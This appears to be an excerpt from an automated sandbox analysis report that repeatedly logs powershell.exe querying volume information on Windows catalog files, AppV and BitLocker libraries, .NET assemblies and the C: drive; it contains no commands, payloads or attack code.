                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
